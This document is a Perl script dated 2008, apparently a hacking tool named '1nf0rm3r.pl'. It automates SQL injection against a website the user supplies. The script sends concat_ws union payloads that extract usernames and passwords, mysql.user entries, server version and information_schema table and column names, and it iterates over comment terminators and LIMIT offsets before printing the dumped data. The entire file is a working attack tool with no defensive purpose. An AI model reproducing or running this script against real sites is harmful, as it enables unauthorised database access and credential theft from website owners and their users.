#!/usr/bin/perl # sm4x - 2008 # 1nf0rm3r.pl # quick perl script to extract db information via website sql injections # v1.1 - 2008-08-20 # perl informer.pl (for limits) use LWP::UserAgent; use HTTP::Request; #use Crypt::SSLeay; @sqldata = (); @warns = (); @urlhits = (); # account info (must be wrapped in $$:$ or NO DATA IS DISPAYED!!) #@account_vectors = ( #'concat_ws(0x24,0x24,concat_ws(0x3a,user,password,0x24))', #); # add ur own customs for more dumps @account_vectors = ( 'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))', 'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))' ); # account database info - custom #@account_dbnames = ( #'mysql.user' #); @account_dbnames = ( 'mysql.user', 'user', 'information_schema.tables', 'information_schema.columns' ); #comments - custom #@comments = ( #'--' #); @comments = ( '', '--', '/*' ); # perl informer.pl $offset = 0; $sqldata = 0; undef %dups; $from_limit = scalar($ARGV[0]); $to_limit = scalar($ARGV[1]); system("clear"); print q{ [+] --------------------------------------------------------------------- [+] .:: 1nf0rm4nt ::. [+] --------------------------------------------------------------------- }; printf("[+] Usage: perl informer.pl \n"); printf("[+] Target: http://target.com/index.php?,,\n"); if($from_limit > -1 && $to_limit > 0) { printf("[+] Limit $from_limit to $to_limit\n"); } # grab the md5 printf("[+] Site start link: "); chomp($start_link = ); #$start_link = ''; if($start_link !~ /http:\/\//) { $start_link = "http://" . $start_link; } printf("[+] Site ending link: "); chomp($end_link = ); #$end_link = ',2'; printf("[+] Targeting: $start_link$end_link\n"); printf("[+]--------------------------------\n"); printf("[+] .:: Scanning ... ::.\n"); foreach $v1(@account_vectors) { $link = $start_link.$v1.$end_link; # attach db with from foreach $db(@account_dbnames) { if(length($db) > 0) { $link2 = $link.'+from+'.$db; } else { $link2 = $link; } # limits? if($from_limit != $to_limit && $to_limit>0) { for($i = scalar($from_limit); $i < scalar($to_limit); $i++) { $pwnd_link_limit = $link2 ."+limit+".$i.",1"; foreach $comment(@comments) { $pwnd_link_limit_comments = $pwnd_link_limit.$comment; $is_printed = 0; #printf("LINK: $pwnd_link_limit_comments\n"); $request = HTTP::Request->new(GET=>$pwnd_link_limit_comments); $useragent = LWP::UserAgent->new(); # check response $response = $useragent->request($request); if($response->is_success && $response->content =~ /\$\$/) { my @vars = split(/\$\$/, $response->content); foreach $item(@vars) { if($item =~ /:\$/) { #printf("INDEX: $item, $result\n"); #$c = index($item, ':$', 0); $data = substr($item, 0, index($item, ':$', 0)); if(!$dups{$data}) { push(@sqldata, $data); $dups{$data} = 1; if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; } $sqldata++; } #printf("."); printf("[+] $data\n"); } } } } } } else { # attach comment and try foreach $comment(@comments) { $pwnd_link = $link2.$comment; #printf("[+] Checking: $pwnd_link\n"; $is_printed = 0; $request = HTTP::Request->new(GET=>$pwnd_link); $useragent = LWP::UserAgent->new(); # check response $response = $useragent->request($request); if($response->is_success && $response->content =~ /\$\$/) { my @vars = split(/\$\$/, $response->content); foreach $item(@vars) { if($item =~ /:\$/) { #printf("INDEX: $item, $result\n"); #$c = index($item, ':$', 0); $data = substr($item, 0, index($item, ':$', 0)); if(!$dups{$data}) { push(@sqldata, $data); $dups{$data} = 1; if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; } $sqldata++; } #printf("."); printf("[+] $data\n"); } } } } # printf(our injection if(!$is_printed) { unshift(@sqlinjections, $pwned_link); #printf("----------------------------------------------------------\n[+] w00t:\n $pwnd_link\n----------------------------------------------------------\n"); $is_printed = 1; } } } } # print found data (no dups) print q{ [+] --------------------------------------------------------------------- [+] .:: r3p0rt ::. [+] --------------------------------------------------------------------- }; #print returned results foreach $item(@sqldata) { printf("[+] $item\n"); } # uncomment for sql query #printf("[+] ---------------------------------------------------------------------\n"); foreach $item(@urlhits) { printf("[+] $item\n"); } printf("[+] ---------------------------------------------------------------------\n"); printf("[+] Total: $sqldata\n"); printf("\n[+] Done\n"); # done